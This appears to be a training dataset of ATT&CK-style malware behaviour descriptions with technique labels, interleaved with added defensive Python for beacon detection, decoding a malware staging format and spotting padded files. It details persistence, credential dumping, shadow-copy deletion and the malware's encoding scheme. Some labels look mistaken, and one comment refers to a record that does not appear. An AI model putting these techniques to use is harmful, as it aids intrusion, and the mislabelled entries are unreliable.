{"text1":"copied and installed tools for operations once in the victim environment.","labels":"['T1105']"}
|
|
{"text1":"copies a file over to the remote system before execution.","labels":"['T1105']"}
|
|
{"text1":"copies an executable payload to the target system by using and then scheduling an unnamed task to execute the malware.","labels":"['T1053.005']"}
|
|
{"text1":"copies documents under 15MB found on the victim system to the user's %temp%\\SMB\\ folder. It also copies files from USB devices to a predefined directory.","labels":"['T1074']"}
|
|
{"text1":"copies files from removable drives to C:\\system.","labels":"['T1074']"}
|
|
{"text1":"copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.","labels":"['T1080']"}
|
|
{"text1":"copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).","labels":"['T1036']"}
|
|
{"text1":"copies itself to disk and creates an associated run key Registry entry to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"copies itself to the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"copies staged data to removable drives when they are inserted into the system.","labels":"['T1052']"}
|
|
{"text1":"created accounts disguised as legitimate backup and service accounts as well as an email administration account.","labels":"['T1036']"}
|
|
{"text1":"created a custom video recording capability that could be used to monitor operations in the victim's environment.","labels":"['T1125']"}
|
|
{"text1":"created a directory named \"out\" in the user's %AppData% folder and copied files to it.","labels":"['T1074']"}
|
|
{"text1":"created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"created a that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.","labels":"['T1218.010']"}
|
|
{"text1":"created new Windows services and added them to the startup directories for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"creates a backdoor by making a connection using a HTTP POST.","labels":"['T1071']"}
|
|
{"text1":"creates a backdoor through which remote attackers can adjust token privileges.","labels":"['T1134']"}
|
|
{"text1":"creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.","labels":"['T1029']"}
|
|
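Two of the records here describe the timing side of C2: an implant that collects and exfiltrates on a fixed ten-minute timer, and a backdoor whose check-in frequency the operator can change remotely. Timer-driven traffic has a statistical signature that human traffic lacks: the gaps between connections to one destination are nearly equal. The following is an added example, not code from the page or from the malware it describes; the flow records are constructed, and the coefficient-of-variation threshold and the six-event minimum are assumptions to tune against your own baseline.

```python
"""Spot fixed-cadence C2 check-ins, such as the every-10-minutes upload in the
record above, in connection telemetry. Added example, not the malware's or the
page's code; the flow records are constructed and the thresholds are
assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev


def inter_arrival_seconds(timestamps):
    """Gaps between consecutive connections, in seconds."""
    ts = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def periodicity_score(timestamps, min_events=6):
    """Return (mean_gap, coefficient_of_variation), or None with too little data.
    CV = stdev / mean: near zero for a timer-driven beacon, large for human
    browsing, and it grows with whatever jitter the operator configures."""
    if len(timestamps) < min_events:
        return None
    gaps = inter_arrival_seconds(timestamps)
    mu = mean(gaps)
    if mu <= 0:
        return None
    return mu, pstdev(gaps) / mu


def find_beacons(flows, max_cv=0.15, min_events=6):
    """Group flows by (src, dst) and return the pairs whose cadence is regular."""
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    hits = []
    for (src, dst), stamps in by_pair.items():
        score = periodicity_score(stamps, min_events)
        if score is not None and score[1] <= max_cv:
            hits.append({"src": src, "dst": dst, "events": len(stamps),
                         "interval_s": round(score[0]), "cv": round(score[1], 3)})
    return hits


def parse_flows(text):
    """Parse the constructed 'timestamp,src,dst' lines used below."""
    flows = []
    for line in text.strip().splitlines():
        ts, src, dst = line.split(",")
        flows.append((datetime.fromisoformat(ts), src, dst))
    return flows


# Constructed sample: one host checking in every ten minutes give or take a few
# seconds of drift, one host browsing irregularly, and one pair with too few
# events to judge.
SAMPLE_FLOWS = """
2024-03-01T09:00:00,10.0.0.5,203.0.113.10:443
2024-03-01T09:10:01,10.0.0.5,203.0.113.10:443
2024-03-01T09:19:59,10.0.0.5,203.0.113.10:443
2024-03-01T09:30:02,10.0.0.5,203.0.113.10:443
2024-03-01T09:39:58,10.0.0.5,203.0.113.10:443
2024-03-01T09:50:00,10.0.0.5,203.0.113.10:443
2024-03-01T10:00:01,10.0.0.5,203.0.113.10:443
2024-03-01T10:09:59,10.0.0.5,203.0.113.10:443
2024-03-01T10:20:00,10.0.0.5,203.0.113.10:443
2024-03-01T09:00:12,10.0.0.7,198.51.100.20:443
2024-03-01T09:00:40,10.0.0.7,198.51.100.20:443
2024-03-01T09:03:15,10.0.0.7,198.51.100.20:443
2024-03-01T09:03:18,10.0.0.7,198.51.100.20:443
2024-03-01T09:20:00,10.0.0.7,198.51.100.20:443
2024-03-01T09:20:07,10.0.0.7,198.51.100.20:443
2024-03-01T09:55:30,10.0.0.7,198.51.100.20:443
2024-03-01T09:05:00,10.0.0.5,192.0.2.9:80
2024-03-01T09:15:00,10.0.0.5,192.0.2.9:80
"""

if __name__ == "__main__":
    for hit in find_beacons(parse_flows(SAMPLE_FLOWS)):
        print(hit)
```

Because the backdoor in the second record lets the operator change the interval, score each (src, dst) pair over a sliding window rather than over the whole day: a cadence that is regular for hours and then becomes regular at a different period is still a beacon, but its all-day CV will look like noise.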
{"text1":"creates a backdoor through which remote attackers can create a service.","labels":"['T1543.003']"}
|
|
{"text1":"creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
|
|
{"text1":"creates a backdoor through which remote attackers can download files and additional malware components.","labels":"['T1105']"}
|
|
{"text1":"creates a backdoor through which remote attackers can download files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"creates a backdoor through which remote attackers can download files onto compromised hosts.","labels":"['T1105']"}
|
|
{"text1":"creates a backdoor through which remote attackers can inject files into running processes.","labels":"['T1055']"}
|
|
{"text1":"creates a backdoor through which remote attackers can load and call DLL functions.","labels":"['T1129']"}
|
|
{"text1":"creates a backdoor through which remote attackers can monitor services.","labels":"['T1007']"}
|
|
{"text1":"creates a backdoor through which remote attackers can obtain data from local systems.","labels":"['T1005']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve a list of running processes.","labels":"['T1057']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve files.","labels":"['T1005']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.","labels":"['T1082']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.","labels":"['T1016']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve lists of files.","labels":"['T1083']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve lists of running processes.","labels":"['T1057']"}
|
|
{"text1":"creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.","labels":"['T1012']"}
|
|
{"text1":"creates a backdoor through which remote attackers can start a remote shell.","labels":"['T1059']"}
|
|
{"text1":"creates a directory, %USERPROFILE%\\AppData\\Local\\SKC\\, which is used to store collected log files.","labels":"['T1074']"}
|
|
{"text1":"creates a Launch Agent on macOS.","labels":"['T1543.001']"}
|
|
{"text1":"creates and uses a VBScript as part of its persistent execution.","labels":"['T1064']"}
|
|
{"text1":"creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d","labels":"['T1036']"}
|
|
{"text1":"creates a new service named \u201cntssrv\u201d to execute the payload.","labels":"['T1569.002', 'T1543.003']"}
|
|
{"text1":"creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.","labels":"['T1543.003']"}
|
|
{"text1":"creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.","labels":"['T1056']"}
|
|
{"text1":"creates a new Windows service with the malicious executable for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"creates a Registry subkey that registers a new service.","labels":"['T1543.003', 'T1112']"}
|
|
{"text1":"creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. 's backdoor also enables remote attackers to modify and delete subkeys.","labels":"['T1112']"}
|
|
{"text1":"creates a scheduled task to establish persistence by executing a malicious payload every subsequent minute.","labels":"['T1053.005']"}
|
|
{"text1":"creates a scheduled task to maintain persistence on the victim\u2019s machine.","labels":"['T1053.005']"}
|
|
{"text1":"creates a scheduled task to run itself every three minutes.","labels":"['T1053.005']"}
|
|
{"text1":"creates a shortcut file and saves it in a Startup folder to establish persistence.","labels":"['T1547.009', 'T1547.001']"}
|
|
{"text1":"creates a suspended svchost process and injects its DLL into it.","labels":"['T1055']"}
|
|
{"text1":"creates a Windows service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"creates folders to store output from batch scripts prior to sending the information to its C2 server.","labels":"['T1074']"}
|
|
{"text1":"creates new services to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().","labels":"['T1106']"}
|
|
{"text1":"creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.","labels":"['T1112']"}
|
|
{"text1":"creates Registry keys to allow itself to run as various services.","labels":"['T1543.003']"}
|
|
{"text1":"creates run key Registry entries pointing to malicious DLLs dropped to disk.","labels":"['T1547.001']"}
|
|
{"text1":"creates scheduled tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"creates the following Registry entry: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia.","labels":"['T1547.001']"}
|
|
{"text1":"creates then deletes log files during installation of itself as a service.","labels":"['T1070.004']"}
|
|
{"text1":"creates valid users to provide access to the system.","labels":"['T1078']"}
|
|
{"text1":"creates various subdirectories under %Temp%\\reports\\% and copies files to those subdirectories. It also creates a folder at C:\\Users\\<Username>\\AppData\\Roaming\\Microsoft\\store to store screenshot JPEG files.","labels":"['T1074']"}
|
|
{"text1":"credential stealer ZUMKONG emails credentials from the victim using HTTP POST requests.","labels":"['T1095']"}
|
|
{"text1":"Data captured by is placed in a temporary file under a directory named \"memdump\".","labels":"['T1074']"}
|
|
{"text1":"Data copied to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.","labels":"['T1486']"}
|
|
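The staging transform in the record above is fully specified except for one word: "rotated by four positions" can mean a rotate of each byte by four bits or a rotation of the byte sequence. The following added example, which is not the malware's code, takes the first reading (a per-byte nibble swap, which is its own inverse) and shows both the encoder and the decoder plus a two-byte signature for triaging staged files. If a sample decodes to garbage under this reading, swap `rot4` for a slice rotation of the buffer.

```python
"""Round-trip codec for the staging transform described above: zlib, then a
4-bit rotate of every byte, then XOR with 0x23. Added example, not the
malware's code. Assumption: "rotated by four positions" is taken as a
per-byte rotate by four bits (a nibble swap).
"""
import zlib

XOR_KEY = 0x23


def rot4(data: bytes) -> bytes:
    """Swap the high and low nibble of every byte. Self-inverse."""
    return bytes(((b << 4) | (b >> 4)) & 0xFF for b in data)


def xor_const(data: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every byte with one constant. Self-inverse."""
    return bytes(b ^ key for b in data)


def encode_staged(plain: bytes) -> bytes:
    """Compress, rotate, XOR: the order the description gives."""
    return xor_const(rot4(zlib.compress(plain)))


def decode_staged(blob: bytes) -> bytes:
    """Undo the three steps in reverse order."""
    return zlib.decompress(rot4(xor_const(blob)))


# A zlib stream starts with 0x78 followed by one of the FLG bytes 0x01, 0x5E,
# 0x9C or 0xDA. Pushing those two bytes through rot4 + XOR 0x23 gives the
# first two bytes every encoded staging file must start with.
ENCODED_MAGIC = {xor_const(rot4(bytes([0x78, flg]))) for flg in (0x01, 0x5E, 0x9C, 0xDA)}


def looks_encoded(blob: bytes) -> bool:
    """Cheap triage check: does the blob start with a transformed zlib header?"""
    return blob[:2] in ENCODED_MAGIC


if __name__ == "__main__":
    sample = b"constructed staging content: hostname=WS01 user=alice\n" * 20
    blob = encode_staged(sample)
    print(blob[:2].hex(), looks_encoded(blob), decode_staged(blob) == sample)
```

Note that the rotate and the XOR do not commute: ROL4(x ^ 0x23) equals ROL4(x) ^ 0x32, so a decoder that peels the two steps in the wrong order produces a valid-looking but wrong byte stream and zlib fails with a header error. With the default compression level the encoded file begins with A4 EA, which is the value to put in a YARA rule or a file-carving scan of the staging directories the other records mention.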
{"text1":"decodes an embedded configuration using XOR.","labels":"['T1140']"}
|
|
{"text1":"decodes Base64 strings and decrypts strings using a custom XOR algorithm.","labels":"['T1140']"}
|
|
{"text1":"decodes embedded XOR strings.","labels":"['T1140']"}
|
|
{"text1":"decodes strings in the malware using XOR and RC4.","labels":"['T1140']"}
|
|
{"text1":"decrypts and extracts a copy of its main DLL payload when executing.","labels":"['T1140']"}
|
|
{"text1":"decrypts code, strings, and commands to use once it's on the victim's machine.","labels":"['T1140']"}
|
|
{"text1":"decrypts resources needed for targeting the victim.","labels":"['T1140']"}
|
|
{"text1":"deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","labels":"['T1070.004']"}
|
|
{"text1":"deleted the DLL dropper from the victim\u2019s machine to cover their tracks.","labels":"['T1070.004']"}
|
|
{"text1":"deletes content from C2 communications that was saved to the user's temporary directory.","labels":"['T1070.004']"}
|
|
{"text1":"deletes data in a way that makes it unrecoverable.","labels":"['T1070.004']"}
|
|
{"text1":"deletes files using DeleteFileW API call.","labels":"['T1070.004']"}
|
|
{"text1":"deletes one of its files, 2.hwp, from the endpoint after establishing persistence.","labels":"['T1070.004']"}
|
|
{"text1":"deletes shadow copies from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"deletes the original dropped file from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"deletes the Registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open.","labels":"['T1112']"}
|
|
{"text1":"delivered to victims via a compromised legitimate website.","labels":"['T1189']"}
|
|
{"text1":"deobfuscates its strings and APIs once its executed.","labels":"['T1140']"}
|
|
{"text1":"DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.","labels":"['T1486']"}
|
|
{"text1":"determines a working directory where it stores all the gathered data about the compromised machine.","labels":"['T1074']"}
|
|
{"text1":"digitally signed an executable with a stolen certificate from legitimate company AI Squared.","labels":"['T1553.002']"}
|
|
{"text1":"discovers information about the infected machine.","labels":"['T1082']"}
|
|
{"text1":"discovers shares on the network.","labels":"['T1135']"}
|
|
{"text1":"discovers the current domain information.","labels":"['T1016']"}
|
|
{"text1":"disguised its malicious binaries with several layers of obfuscation, including encrypting the files.","labels":"['T1027']"}
|
|
{"text1":"DLL file and non-malicious decoy file are encrypted with RC4.","labels":"['T1027']"}
|
|
{"text1":"DLL side-loading has been used to execute through a legitimate Citrix executable ssonsvr.exe which is vulnerable to the technique. The Citrix executable was dropped along with by the dropper.","labels":"['T1574.002']"}
|
|
{"text1":"downloaded and launched code within a SCT file.","labels":"['T1064']"}
|
|
{"text1":"downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.","labels":"['T1027.001']"}
|
|
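The padding trick in the record above works because scanners and sandboxes skip or down-prioritise files over a size limit, and because every padded copy gets a different file hash. Both effects are easy to undo once you measure the trailing run. The following added example is not the downloader's code; it reads "0 characters" as any single repeated byte (0x30 or 0x00), and the one-mebibyte floor and the 50% ratio are assumptions.

```python
"""Measure the trailing-padding trick from the record above: a payload grown
with a long run of one byte to dodge scanning. Added example, not the
malware's code; thresholds are assumptions.
"""
import hashlib


def trailing_pad(data: bytes):
    """(pad_byte, run_length) for the run of one repeated byte that ends the buffer."""
    if not data:
        return None, 0
    last = data[-1]
    core = data.rstrip(bytes([last]))
    return last, len(data) - len(core)


def is_inflated(data: bytes, min_ratio: float = 0.5, min_pad: int = 1 << 20) -> bool:
    """True when the padding is both most of the file and large in absolute
    terms, so a small file that merely ends in a few repeated bytes is not flagged."""
    _, n = trailing_pad(data)
    return bool(data) and n >= min_pad and n / len(data) >= min_ratio


def core_sha256(data: bytes, min_pad: int = 16) -> str:
    """Hash with the padding removed: the same payload padded to different sizes
    collapses to one value, which the plain file hash does not. Runs shorter
    than `min_pad` are kept, so ordinary files hash unchanged."""
    _, n = trailing_pad(data)
    if n < min_pad:
        n = 0
    return hashlib.sha256(data[: len(data) - n]).hexdigest()


if __name__ == "__main__":
    fake_pe = b"MZ" + bytes(range(256)) + b"\x00" * 100   # constructed stand-in
    for size in (4096, 65536):
        padded = fake_pe + b"0" * size
        print(size, trailing_pad(padded), is_inflated(padded, min_pad=1024), core_sha256(padded))
```

`core_sha256` is the dedup key to store alongside the ordinary hash: two samples that differ only in how much padding the downloader appended should cluster together, and a pad byte of 0x30 rather than 0x00 is itself a usable heuristic, since compilers and packers pad with zeros.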
{"text1":"downloads additional files from C2 servers.","labels":"['T1105']"}
|
|
{"text1":"downloads additional files that are base64-encoded and encrypted with another cipher.","labels":"['T1027']"}
|
|
{"text1":"downloads additional payloads.","labels":"['T1105']"}
|
|
{"text1":"downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.","labels":"['T1105']"}
|
|
{"text1":"downloads and executes additional PowerShell code and Windows binaries.","labels":"['T1105']"}
|
|
{"text1":"downloads and executes PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"downloads and installs Tor via homebrew.","labels":"['T1090.003']"}
|
|
{"text1":"downloads and uploads files on the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"downloads a new version of itself once it has installed. It also downloads additional plugins.","labels":"['T1105']"}
|
|
{"text1":"downloads an executable and injects it directly into a new process.","labels":"['T1055']"}
|
|
{"text1":"downloads a PowerShell script that decodes to a typical shellcode loader.","labels":"['T1059.001']"}
{"text1":"downloads encoded payloads and decodes them on the victim.","labels":"['T1140']"}
{"text1":"downloads files onto infected hosts.","labels":"['T1105']"}
{"text1":"downloads several additional files and saves them to the victim's machine.","labels":"['T1105']"}
{"text1":"dropped and executed SecretsDump and CrackMapExec, tools that can dump password hashes.","labels":"['T1003']"}
{"text1":"dropped and executed tools used for password cracking, including Hydra.","labels":"['T1110']"}
{"text1":"dropper creates VBS scripts on the victim\u2019s machine.","labels":"['T1064']"}
{"text1":"Droppers used by use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 \u2013 0xAF to obfuscate payloads.","labels":"['T1027']"}
{"text1":"drops a signed Microsoft DLL to disk.","labels":"['T1553.002']"}
{"text1":"drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro.","labels":"['T1140']"}
{"text1":"drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.","labels":"['T1092']"}
{"text1":"dumped the login data database from \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.","labels":"['T1003']"}
{"text1":"dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.","labels":"['T1005']"}
{"text1":"dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.","labels":"['T1003']"}
{"text1":"During execution, malware deobfuscates and decompresses code that was encoded with Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1140']"}
{"text1":"During its initial execution, extracts operating system information from the infected host.","labels":"['T1082']"}
{"text1":"During the installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.","labels":"['T1574.002']"}
{"text1":"Each time a new drive is inserted, generates a list of all files on the drive and stores it in an encrypted file.","labels":"['T1119']"}
{"text1":"embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.","labels":"['T1204']"}
{"text1":"embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened. The actors also used batch scripting.","labels":"['T1064']"}
{"text1":"employs the same encoding scheme as for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.","labels":"['T1486']"}
{"text1":"enables remote interaction and can obtain additional code over HTTPS GET and POST requests.","labels":"['T1071']"}
{"text1":"enables the Remote Desktop Protocol for persistence.","labels":"['T1021.001']"}
{"text1":"encapsulates traffic in multiple layers of encryption.","labels":"['T1573']"}
{"text1":"encoded C2 traffic with base64.","labels":"['T1132']"}
{"text1":"encodes C2 beacons using XOR.","labels":"['T1573']"}
{"text1":"encodes C2 traffic with base64.","labels":"['T1132']"}
{"text1":"encodes C2 traffic with Base64.","labels":"['T1132']"}
{"text1":"encodes commands from the control server using a range of characters and gzip.","labels":"['T1132']"}
{"text1":"encodes communications to the C2 server in Base64.","labels":"['T1132']"}
{"text1":"encodes files before exfiltration.","labels":"['T1132']"}
{"text1":"encodes files in Base64.","labels":"['T1027']"}
{"text1":"encrypted a .dll payload using RTL and a custom encryption algorithm. has also obfuscated payloads with base64, XOR, and RC4.","labels":"['T1027']"}
{"text1":"encrypts C2 communications with RC4 as well as TLS.","labels":"['T1573']"}
{"text1":"encrypts C2 content with XOR using a single byte, 0x12.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic using AES with a static key.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic using an RC4 key.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic using RC4 with a static key.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic with AES and RSA.","labels":"['T1573']"}
{"text1":"encrypts C2 traffic with HTTPS and also encodes it with a single-byte XOR key.","labels":"['T1573']"}
{"text1":"encrypts collected data using a single byte XOR key.","labels":"['T1486']"}
{"text1":"encrypts command and control communications with RC4.","labels":"['T1573']"}
{"text1":"encrypts data sent to its C2 server over HTTP with RC4.","labels":"['T1573']"}
{"text1":"encrypts exfiltrated data with RC4.","labels":"['T1573']"}
{"text1":"encrypts several of its files, including configuration files.","labels":"['T1027']"}
{"text1":"encrypts some C2 traffic with the Blowfish cipher.","labels":"['T1573']"}
{"text1":"encrypts some of its files with XOR.","labels":"['T1027']"}
{"text1":"encrypts strings in the backdoor using a custom XOR algorithm.","labels":"['T1027']"}
{"text1":"encrypts strings to make analysis more difficult.","labels":"['T1027']"}
{"text1":"encrypts the collected files using 3-DES.","labels":"['T1486']"}
{"text1":"encrypts the message body of HTTP traffic with RC2 (in CBC mode) and Base64 encoding.","labels":"['T1573']"}
{"text1":"encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.","labels":"['T1486']"}
{"text1":"enumerates directories and obtains file attributes on a system.","labels":"['T1083']"}
{"text1":"enumerates directories and scans for certain files.","labels":"['T1083']"}
{"text1":"enumerates local and domain users","labels":"['T1087']"}
{"text1":"enumerates the current network connections similar to net use .","labels":"['T1049']"}
{"text1":"established persistence by adding a Shell value under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion]Winlogon.","labels":"['T1547.004']"}
{"text1":"establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.","labels":"['T1547.008']"}
{"text1":"establishes persistence by adding a new service with the display name \"WMI Performance Adapter Extension\" in an attempt to masquerade as a legitimate WMI service.","labels":"['T1036']"}
{"text1":"establishes persistence by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"establishes persistence by creating a shortcut.","labels":"['T1547.009']"}
{"text1":"establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in.","labels":"['T1547.009']"}
{"text1":"establishes persistence by creating the Registry key HKCU\\Software\\Microsoft\\Windows\\Run.","labels":"['T1547.001']"}
{"text1":"establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.","labels":"['T1543.003']"}
{"text1":"establishes persistence in the Startup folder.","labels":"['T1547.001']"}
{"text1":"establishes persistence through a Registry Run key.","labels":"['T1547.001']"}
{"text1":"establishes persistence under the Registry key HKCU\\Software\\Run auto_update.","labels":"['T1547.001']"}
{"text1":"examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.","labels":"['T1134']"}
{"text1":"executes a batch script to store discovery information in %TEMP%\\info.dat and then uploads the temporarily file to the remote C2 server.","labels":"['T1119']"}
{"text1":"executes a binary on the system and logs the results into a temp file by using: cmd.exe \/c \"<file_path> > %temp%\\PM* .tmp 2>&1\".","labels":"['T1059']"}
{"text1":"executes additional Jscript and VBScript code on the victim's machine.","labels":"['T1064']"}
{"text1":"executes and stores obfuscated Perl scripts.","labels":"['T1027']"}
{"text1":"executes BAT and VBS scripts.","labels":"['T1064']"}
{"text1":"executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.","labels":"['T1059']"}
{"text1":"executes cmd.exe to provide a reverse shell to adversaries.","labels":"['T1059']"}
{"text1":"executes commands remotely on the infected host.","labels":"['T1059']"}
{"text1":"executes commands remotely via cmd.exe.","labels":"['T1059']"}
{"text1":"executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.","labels":"['T1059']"}
{"text1":"executes functions using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"executes ipconfig \/all after initial communication is made to the remote server.","labels":"['T1016']"}
{"text1":"executes net start after initial communication is made to the remote server.","labels":"['T1007']"}
{"text1":"executes net user after initial communication is made to the remote server.","labels":"['T1087']"}
{"text1":"executes payloads using the Windows API call CreateProcessW().","labels":"['T1106']"}
{"text1":"executes shellcode and a script to decode Base64 strings.","labels":"['T1064']"}
{"text1":"executes systeminfo after initial communication is made to the remote server.","labels":"['T1082']"}
{"text1":"executes the netstat -ano command.","labels":"['T1049']"}
{"text1":"executes using PowerShell and can also perform pass-the-ticket and use Lazagne for harvesting credentials.","labels":"['T1003']"}
{"text1":"executes using regsvr32.exe called from the persistence mechanism.","labels":"['T1218.010']"}
{"text1":"exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.","labels":"['T1048']"}
{"text1":"exfiltrates command output and collected files to its C2 server in 1500-byte blocks.","labels":"['T1030']"}
{"text1":"exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.","labels":"['T1048']"}
{"text1":"exfiltrates data in compressed chunks if a message is larger than 4096 bytes .","labels":"['T1030']"}
{"text1":"exfiltrates data over the same channel used for C2.","labels":"['T1041']"}
{"text1":"exfiltrates data using cookie values that are Base64-encoded.","labels":"['T1132']"}
{"text1":"exfiltrates screenshot files to its C2 server.","labels":"['T1041']"}
{"text1":"extracts and decrypts stage 3 malware, which is stored in encrypted resources.","labels":"['T1140']"}
{"text1":"Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures.","labels":"['T1027.005']"}
{"text1":"finds a specified directory, lists the files and metadata about those files.","labels":"['T1083']"}
{"text1":"first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.","labels":"['T1008']"}
{"text1":"first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.","labels":"['T1027']"}
{"text1":"Following data collection, has compressed log files into a ZIP archive prior to staging and exfiltration.","labels":"['T1560']"}
{"text1":"Following exploitation with malware, actors created a file containing a list of commands to be executed on the compromised computer.","labels":"['T1059']"}
{"text1":"For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration.","labels":"['T1119']"}
{"text1":"For early versions, the compilation timestamp was faked.","labels":"['T1070.006']"}
{"text1":"gains persistence by adding the Registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce.","labels":"['T1547.001']"}
{"text1":"gathered information and files from local directories for exfiltration.","labels":"['T1005']"}
{"text1":"gathers and beacons the operating system build number and CPU Architecture (32-bit\/64-bit) during installation.","labels":"['T1082']"}
{"text1":"gathers and beacons the system time during installation.","labels":"['T1124']"}
{"text1":"gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.","labels":"['T1033']"}
{"text1":"gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.","labels":"['T1082']"}
{"text1":"gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.","labels":"['T1082']"}
{"text1":"gathers domain and account names\/information through process monitoring.","labels":"['T1087']"}
{"text1":"gathers file and directory information from the victim\u2019s machine.","labels":"['T1083']"}
{"text1":"gathers information about local groups and members.","labels":"['T1069']"}
{"text1":"gathers information about network adapters.","labels":"['T1016']"}
{"text1":"gathers information about opened windows.","labels":"['T1010']"}
{"text1":"gathers information about the Registry.","labels":"['T1012']"}
{"text1":"gathers information on local groups and members on the victim\u2019s machine.","labels":"['T1087']"}
{"text1":"gathers information on users.","labels":"['T1033']"}
{"text1":"gathers product names from the Registry key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName and the processor description from the Registry key HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString.","labels":"['T1012']"}
{"text1":"gathers system configuration information.","labels":"['T1082']"}
{"text1":"gathers system information, network addresses, disk type, disk free space, and the operation system version.","labels":"['T1082']"}
{"text1":"gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command systeminfo.","labels":"['T1082']"}
{"text1":"gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.","labels":"['T1082']"}
{"text1":"gathers the current domain the victim system belongs to.","labels":"['T1016']"}
{"text1":"gathers the IP address and domain from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"gathers the local system time from the victim\u2019s machine.","labels":"['T1124']"}
{"text1":"gathers the Mac address, IP address, and the network adapter information from the victim\u2019s machine.","labels":"['T1016']"}
